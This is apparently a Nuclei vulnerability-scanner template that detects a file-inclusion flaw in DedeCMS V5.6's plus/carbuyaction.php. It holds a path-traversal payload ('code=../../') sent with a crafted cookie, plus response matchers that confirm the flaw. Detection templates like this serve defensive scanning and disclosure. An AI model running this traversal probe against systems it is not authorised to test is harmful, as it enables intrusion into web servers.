29 lines
548 B
YAML
29 lines
548 B
YAML
|
id: dedecms-carbuyaction-fileinclude
|
||
|
|
||
|
info:
|
||
|
name: DedeCmsV5.6 Carbuyaction Fileinclude
|
||
|
author: pikpikcu
|
||
|
severity: high
|
||
|
reference: https://www.cnblogs.com/milantgh/p/3615986.html
|
||
|
tags: dedecms
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
|
||
|
headers:
|
||
|
Cookie: code=cod
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "Cod::respond()"
|
||
|
part: body
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|